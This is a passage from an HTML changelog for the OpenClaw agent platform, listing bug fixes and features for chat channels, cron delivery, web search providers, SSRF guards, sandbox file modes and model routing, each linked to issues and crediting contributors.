<p>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</p>
</li>
<li>
<p>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</p>
</li>
<li>
<p>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</p>
</li>
<li>
<p>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</p>
</li>
<li>
<p>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</p>
</li>
<li>
<p>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</p>
</li>
<li>
<p>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</p>
</li>
<li>
<p>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</p>
</li>
<li>
<p>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</p>
</li>
<li>
<p>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</p>
</li>
<li>
<p>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</p>
</li>
<li>
<p>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</p>
</li>
<li>
<p>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</p>
</li>
<li>
<p>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</p>
</li>
<li>
<p>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</p>
</li>
<li>
<p>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</p>
</li>
<li>
<p>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</p>
</li>
<li>
<p>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</p>
</li>
<li>
<p>Web search/SearXNG: show the JSON API <code>search.formats</code> prerequisite during SearXNG setup before prompting for the base URL. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>.</p>
</li>
<li>
<p>Web search/SearXNG: pass through <code>img_src</code> image URLs from SearXNG image-category results. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>.</p>
</li>
<li>
<p>Web search/Kimi: fail explicitly when Moonshot returns an ungrounded chat answer instead of native web-search evidence, so Kimi no longer reports generic fallback text as a successful search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>.</p>
</li>
<li>
<p>Web search: keep public provider requests on the strict SSRF guard and reserve private-network access for explicit self-hosted SearXNG/Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>.</p>
</li>
<li>
<p>Firecrawl: reject private, loopback, metadata, and non-HTTP(S) <code>firecrawl_scrape</code> target URLs before forwarding them to Firecrawl. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>.</p>
</li>
<li>
<p>Web search/Firecrawl: allow self-hosted private/internal Firecrawl <code>baseUrl</code> endpoints, including HTTP for private targets, while keeping hosted Firecrawl on the strict official endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</p>
</li>
<li>
<p>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</p>
</li>
<li>
<p>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</p>
</li>
<li>
<p>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</p>
</li>
<li>
<p>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Web search/Exa: accept <code>plugins.entries.exa.config.webSearch.baseUrl</code>, normalize it to the Exa <code>/search</code> endpoint, and partition cached results by endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>.</p>
</li>
<li>
